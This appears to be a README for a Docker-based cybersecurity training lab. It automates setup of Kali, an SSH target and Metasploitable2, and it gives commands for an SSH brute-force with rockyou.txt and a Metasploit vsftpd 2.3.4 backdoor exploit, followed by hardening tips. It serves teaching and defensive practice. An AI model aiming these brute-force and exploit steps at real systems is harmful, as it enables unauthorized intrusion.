This project provides a fast-deployable, containerized cybersecurity lab to simulate real-world attacks and defenses. It uses Ansible for automation, Docker + Colima for environment management, and includes tools like Hydra, Metasploit, and Nmap for offensive testing—all within minutes.
Ideal for:
- 🎓 Cybersecurity students
- 🧑💻 Bootcamp labs
- 🧪 CTF prep & demonstrations
- 🛡️ Red teaming practice
- 🔐 Brute-force SSH logins using
Hydrawith real credential wordlists - 💥 Exploit known vulnerabilities (e.g.,
vsftpd,phpMyAdmin) usingMetasploit - ⚙️ Automate full lab setup/teardown using
Ansible - 🖥️ Showcase demos with clear steps for scanning, exploiting, and hardening
- Python 3
- Docker + Colima (for Mac users)
- Ansible
- Kali Linux (attacker)
- Ubuntu w/ SSH (target)
- Metasploitable2
- Hydra, Nmap, Metasploit Framework
ssh-rdp-brute-lab/
├── ansible/
│ ├── setup-kali.yml
│ ├── setup-target.yml
│ ├── setup-metasploit.yml
│ └── lab-cleanup.yml
├── scripts/
│ └── ssh_bruteforce.py
└── README.md
colima start
docker context use colimacd ansible
ansible-playbook setup-target.yml
ansible-playbook setup-kali.yml
ansible-playbook setup-metasploit.ymldocker cp scripts/ssh_bruteforce.py kali_attacker:/root/
docker exec -it kali_attacker python3 /root/ssh_bruteforce.pyThis script:
- Scans
host.docker.internal:2222for open SSH - Attempts login using
rockyou.txt
docker exec -it kali_attacker msfconsoleExample exploit:
use exploit/unix/ftp/vsftpd_234_backdoor
set RHOST host.docker.internal
set RPORT 21
run- Nmap port scan
- Hydra brute-force attack
- Metasploit shell exploit
- Security hardening recommendations
- Disable SSH root login
- Enforce key-based authentication
- Use tools like
fail2ban - Patch vulnerable services
- Restrict Docker networking
ansible-playbook ansible/lab-cleanup.ymlHave ideas to expand the lab? Submit a pull request or fork to add:
- RDP/SMB attacks
- Web exploits (e.g., bWAPP, DVWA)
- Defense tools like Suricata or Splunk